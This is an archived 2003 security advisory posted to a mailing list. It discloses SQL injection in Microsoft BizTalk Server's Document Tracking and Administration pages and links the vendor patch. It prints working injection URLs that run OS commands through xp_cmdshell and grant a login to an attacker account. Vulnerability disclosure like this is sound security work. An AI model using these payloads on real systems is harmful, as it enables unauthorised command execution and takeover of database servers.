|
|||||||||||
|
Microsoft Biztalk Server DTA vulnerable to SQL injection
From: Cesar <cesarc56(at)yahoo.com>
Date: Mon May 05 2003 - 16:43:22 EDT
Name: Microsoft Biztalk Server Document Tracking and
Admnistration vulnerable to SQL injection
System Affected : BizTalk Server 2000 and BizTalk
Server 2002
Legal Notice: This Advisory is Copyright (c) 2003 Cesar Cerrudo. You may distribute it unmodified and for free. You may NOT modify it and distribute it or distribute parts of it without the author's written permission. You may NOT use it for commercial intentions (this means include it in vulnerabilities databases, vulnerabilities scanners, any paid service, etc.) without the author's written permission. You are free to use Microsoft bulletin's details for commercial intentions. Disclaimer:
The information in this advisory is believed to be
true though it may be false.
Overview:
Microsoft Biztalk Server is a Microsoft product for
business-process automation
Details:
BizTalk Document Tracking and Administration is a
stand-alone Web application that you can use to
view interchanges and documents that you configured to
be tracked in Microsoft
http://server/biztalktracking/
There are two ASP pages on the web application that
connect from server side to SQL
http://server/biztalktracking/rawdocdata.asp http://server/biztalktracking/RawCustomSearchField.asp Exploits: http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;exec master.dbo.xp_cmdshell 'any OS command'-- http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection=1;exec master.dbo.xp_cmdshell 'any OS command'-- or http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;exec master.dbo.sp_grantlogin 'domain\attacker'-- http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection=1;exec master.dbo.sp_grantlogin 'domain\attacker'-- ...etc.
There are others ASP and HTML pages in the Web
application that connect to SQL Server
This vulnerability can be exploited throght XSS or
sending an administrator
Workaround: Edit ASP and HTML source files to filter malicious input. Vendor Status : Microsoft was contacted 02/14/03, we work together and Microsoft released a fix. Patch Available : http://www.microsoft.com/technet/security/bulletin/MS03-016.asp
NEW SECURITY LIST!!!: For people interested in SQL
Server security, vulnerabilities, SQL injection, etc.,
I'm starting a new mailing list.
sqlserversecurity-subscribe@yahoogroups.com http://groups.yahoo.com/group/sqlserversecurity/ Do you Yahoo!? The New Yahoo! Search - Faster. Easier. Bingo. http://search.yahoo.com Received on Mon May 5 16:51:40 2003 This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:38 EDT |
||||||||||
|
|||||||||||